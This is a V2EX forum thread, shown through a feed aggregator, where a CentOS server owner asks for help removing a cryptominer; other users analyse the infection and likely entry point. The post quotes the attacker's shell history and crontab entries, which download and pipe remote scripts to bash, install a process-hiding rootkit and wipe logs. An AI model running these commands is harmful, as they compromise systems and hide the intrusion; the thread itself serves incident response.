惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
博客园 - 司徒正美
aimingoo的专栏
aimingoo的专栏
N
News and Events Feed by Topic
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
O
OpenAI News
L
LINUX DO - 最新话题
WordPress大学
WordPress大学
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
大猫的无限游戏
大猫的无限游戏
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
月光博客
月光博客
M
MIT News - Artificial intelligence
Vercel News
Vercel News
罗磊的独立博客
博客园 - 【当耐特】
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Webroot Blog
Webroot Blog
Jina AI
Jina AI
人人都是产品经理
人人都是产品经理
小众软件
小众软件
Last Week in AI
Last Week in AI
C
Check Point Blog
The Last Watchdog
The Last Watchdog
美团技术团队
H
Hacker News: Front Page
Attack and Defense Labs
Attack and Defense Labs
www.infosecurity-magazine.com
www.infosecurity-magazine.com
Schneier on Security
Schneier on Security
Google Online Security Blog
Google Online Security Blog
Microsoft Azure Blog
Microsoft Azure Blog
Application and Cybersecurity Blog
Application and Cybersecurity Blog
Forbes - Security
Forbes - Security
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
U
Unit 42
Help Net Security
Help Net Security
P
Proofpoint News Feed
W
WeLiveSecurity
The GitHub Blog
The GitHub Blog
Hacker News: Ask HN
Hacker News: Ask HN
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Security Archives - TechRepublic
Security Archives - TechRepublic
Recorded Future
Recorded Future
Recent Commits to openclaw:main
Recent Commits to openclaw:main
F
Fortinet All Blogs
D
DataBreaches.Net
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
S
Securelist
G
Google Developers Blog
P
Privacy International News Feed

CentOS

vscode 的 remote-ssh 还支持 centos7 吗? - V2EX CentOS Stream 10 正式 GA, RHEL 10 Beta 也上路了 CentOS 采用 stream 升级以后,真的会有人选择 Rocky 或者 Alma Linux 吗 使用迁移工具迁移 centos7 会有什么坑? - V2EX CentOS 将于 6 月 30 全面停服。 - V2EX Linux 小白求助 swap 占用问题 - V2EX 求助,如何在 Centos9 文本安装模式下对 root 分区进行 luks 加密? - V2EX 为什么 CENTOS crontab 的 PATH 不包含/usr/sbin? Centos7 资源没怎么占用,执行各种命令都很卡,求大佬帮忙解决下 - V2EX centos7 网络无法启动,无法理解缘由 - V2EX 改完 root 密码后 SSH 无法登录了 - V2EX [求助]centos 6.5 配置多个公网 ip - V2EX 如果 centos7 版本也停更了,替代方案还有哪些 - V2EX [实在是高] redha 直接消灭了免费的二进制兼容的 rhel 发行版 - V2EX Centos 7.9 firewall 报错 - V2EX Linux 字体不定期失效问题 - V2EX centos 不维护后,还有哪些好的 server 端 os 可以替代 centos? - V2EX 请教 vps 内外网卡均显示内网 ip 地址问题, 如何修改 - V2EX Cockpit 自动登录二级服务器问题 - V2EX centos 如何做个端口映射? - V2EX centos 8 rc.local 不能正常工作 - V2EX CentOS 如何创建一个用户,只允许该用户(只读)访问特定文件夹下的文件,其他文件均对其不可见 - V2EX AlmaLinux 8.5 发布了 - V2EX CentOS 8 即将在本年年底停止维护,最近有各种各样的基于 CentOS 的二次发行版出现,大家如何看待。 - V2EX 有感于 CentOS 停止维护 - V2EX CentOS 装 smb 无法在 macOS 和 Windows 里的网络里显示? - V2EX centos 防火墙关闭后端口依旧无法访问 - V2EX centos swap 内存不被使用问题 - V2EX i7-10700 不支持 centos7.6 吗,安装直接黑屏 - V2EX 急! centos7 安装过程中卡住 - V2EX 求助: ssh 远程无法登陆提示: Permission denied, please try again - V2EX 请教一个 centos8 命令 brctl 问题 - V2EX CentOS 悄悄的走了? - V2EX Rocky Linux [CentOS 后续] - V2EX 更新到了 centos stream,然后 vnc 挂了 - V2EX RIP CentOS - V2EX CentOS 8, 21 年底 EOF,以后就变滚动更新了。 以后也没 CentOS 9 了 - V2EX centos7 系统 hp gen 系列服务器,两块 ssd 做了 raid1,如何远程查看硬盘是否损坏? - V2EX 一拨号默认路由就断了 这个怎么解决 - V2EX bt 的同步时间好像有问题了? - V2EX 求助一个关于 CentOS 8 防火墙 Firewalld 的问题 - V2EX CentOS 7.7 系统,数据库放数据盘有什么危害?数据库比较大,现在数据盘还剩 6G,更换麻烦 - V2EX www.hop5.in 这个源可靠么 - V2EX centos7 内核 3.10 升级到 5.72 无法识别网卡 - V2EX 因为弱口令服务器遭到 dota3 木马攻击,病毒脚本供大家研究 - V2EX 求教 nfs 服务器挂载报 Connection refused 的问题 - V2EX CentOS 8 为什么有这么大坑? - V2EX 多网段互联互通问题? - V2EX podman pod create 遇墙 - V2EX
[求助] 系统中毒了,找到了进程和文件,无法杀死和删除 - V2EX
quadrapop · 2022-12-02 · via CentOS

这是一个创建于 1290 天前的主题,其中的信息可能已经有所发展或是发生改变。

直接进入主题

操作日志

1  export TERM=xterm
    2  top
    3  /usr/lib/sys/rcu_bj 
    4  cd /usr/lib/sys/
    5  ls
    6  chmod +x rcu_bj 
    7  ./rcu_bj 
    8  chattr -ia rcu_bj
    9  ./rcu_bj 
   10  cd /
   11  mkdir .a
   12  cd .a
   13  git clone https://github.com/alfonmga/hiding-cryptominers-linux-rootkit.git
   14  cd hiding-cryptominers-linux-rootkit/
   15  ls
   16  make
   17  dmesg
   18  dmesg -C
   19  ls
   20  make
   21  ls
   22  make
   23  make
   24  cd ..
   25  rm -rf hiding-cryptominers-linux-rootkit/
   26  curl -LO http://1.234.16.54:7070/apiapi/api/raw/master/s.zip;mv s.zip rcu;chmod +x rcu
   27  ./rcu 
   28  top
   29  rm -rf /var/log/*
   30  cat /dev/null > ~/.bash_history
   31  id
   32  curl http://123.30.179.206:8189/solr/.v7/api | bash   
   33  ps auxw --sort=%cpu|tail -10
   34  lscpu
   35  ps auxw --sort=%cpu|tail -10
   36  ps auxw --sort=%cpu|tail -10
   37  ps auxw --sort=%cpu|tail -10
   38  ps aux | grep rcu
   39  python -c 'import pty; pty.spawn("/bin/bash")'

帮忙解读下这段脚本都干嘛了-_-

https://github.com/alfonmga/hiding-cryptominers-linux-rootkit

下载的这个脚本看用途是用来隐藏文件夹和进程的

3 个可疑文件看起来没有隐藏文件属性,但是无法删除

[root@localhost profile.d]# cd /usr/lib/sys
[root@localhost sys]# ll
总用量 8
-rwxr-x--x 1 root confluence    0 12 月  1 18:38 rcu_bj
-rwxr-x--- 1 root confluence 2786 11 月 14 11:01 rcu_libk
-rwxrwx--- 1 root root       1199 11 月 14 11:01 rcu_udev
-rwxr-x--- 1 root confluence    0 11 月 14 18:02 systemd
[root@localhost sys]# lsattr rcu_bj
---------------- rcu_bj
您在 /var/spool/mail/root 中有邮件
[root@localhost sys]# lsattr rcu_libk
---------------- rcu_libk
[root@localhost sys]# lsattr rcu_undev
lsattr: 没有那个文件或目录 当尝试对 rcu_undev 进行 stat 调用时
[root@localhost sys]# lsattr rcu_udev
---------------- rcu_udev

进程也杀不死

[root@localhost sys]# ps -ef|grep rcu
root          8      2  0 4 月 13 ?       00:00:06 [rcu_bh]
root          9      2  0 4 月 13 ?       22:01:59 [rcu_sched]
root     168224 243031  0 16:28 pts/24   00:00:00 grep --color=auto rcu

各位大佬接下来应该怎么办呀

第 1 条附言  ·  2022 年 12 月 2 日

[root@localhost sys]# alias
alias cp='cp -i'
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias grep='grep --color=auto'
alias l.='ls -d .* --color=auto'
alias ll='ls -l --color=auto'
alias ls='ls --color=auto'
alias mv='mv -i'
alias rm='rm -i'
alias which='alias | /usr/bin/which --tty-only --read-alias --show-dot --show-tilde'
[root@localhost sys]# crontab -l

alias看起来正常,定时任务之前有一个我已经删掉了,查看端口也没有发现什么异常,应该是通过那个rootkit

隐藏了什么东西-_-

第 2 条附言  ·  2022 年 12 月 5 日

[root@localhost home]# crontab -u confluence -l
*/3 * * * * (curl -fsSL https://pastebin.com/raw/NfCRw0LF||wget -q -O- https://pastebin.com/raw/NfCRw0LF|| bash -sh
* * * * * curl -fsSL http://j0llychic.com/mkdir_trace2.sh | bash > /dev/null 2>&1
*/30 * * * *    confluence /var/tmp/.crontab/crontab

这个用户发现了几个定时任务

dier

1

dier      2022 年 12 月 2 日

检查一下 alias 有没有配置陌生的别名
试试修改这个文件的权限
检查一下 crontab
尝试编辑随便编辑文件内容或修改文件名

看能不能阻止自动启动

quadrapop

2

quadrapop      2022 年 12 月 2 日

@dier alias 和调度器都看起来正常。
脚本中的 http://1.234.16.54:7070/apiapi/api/raw/master/s.zip
我下下来有差不多 6M ,但是文件是损坏的

Nitroethane

3

Nitroethane      2022 年 12 月 2 日

首先不确定你给出的 bash 历史记录是否是完整的,因为 "/usr/lib/sys/rcu_bj" 这个文件像是攻击者植入的,默认系统没有这个文件。
从 GitHub 克隆的这个项目的用途是使用内核模块隐藏挖矿木马的进程信息和 CPU 使用率。
从 1.234.16.54 这个网站下载的 s.zip 不是压缩文件,是一个 ELF ,把 sha256 扔到 virustotal 上发现它是一个挖矿木马。
至于请求 123.30.179.206 这个 URL ,我手动访问了下,返回是 404 ,看命令的话,正常情况应该是一个 shell 脚本,猜测可能是做横向移动用的。

首先你得确认攻击者是从什么入口进来的,通过对公网开放的端口大致可以确定。然后搞清楚攻击者通过这个入口进来后拿到的是什么权限,如果是 root 的话可以考虑备份重要数据然后重装了。不过还是得确定从什么入口进来,要把相应的漏洞修复,否则以后还会中招。

Nitroethane

4

Nitroethane      2022 年 12 月 2 日

至于你说的「进程也杀不死」,这两个进程 rcu_sched 和 rcu_bh ,它们的 PPID 都为 2 ,所以是内核线程,肯定杀不死,而且这两个内核线程应该是正常的。

cxh116

5

cxh116      2022 年 12 月 2 日

这种情况应该第一时间关机.

再 u 盘启动,备份数据.防止重要数据被删除或加密了.到时怕交 BTC 也拿不回.
之后再 chroot 修,或直接重装,再把数据拷进去.

quadrapop

6

quadrapop      2022 年 12 月 5 日

@Nitroethane
操作记录只有这么多了,这一段脚本中应该是把日志删除了
这个 rootkit 可以隐藏进程和 cpu 使用率,我搜了下,没找到怎么把隐藏的给显示出来。
现在也不太确定时候从哪个端口进来的,外网几个映射端口已经关掉了-_-
就是这 2 个进程也不知道应该怎么办。

Nitroethane

7

Nitroethane      2022 年 12 月 5 日

@quadrapop

注意看我的回复:至于你说的「进程也杀不死」,这两个进程 rcu_sched 和 rcu_bh ,它们的 PPID 都为 2 ,所以是内核线程,肯定杀不死,而且这两个内核线程应该是正常的。

通过 /usr/lib/sys 目录下那两个挖矿木马的文件属性判断,应该是通过 confluence 的漏洞进来的。前段时间 confluence 爆出过好几个高危漏洞,赶紧升级下吧。

Nitroethane

8

Nitroethane      2022 年 12 月 5 日

你贴出来的这些权限维持操作不是同一个人做的,这台服务器应该是像公交车一样,被很多人上了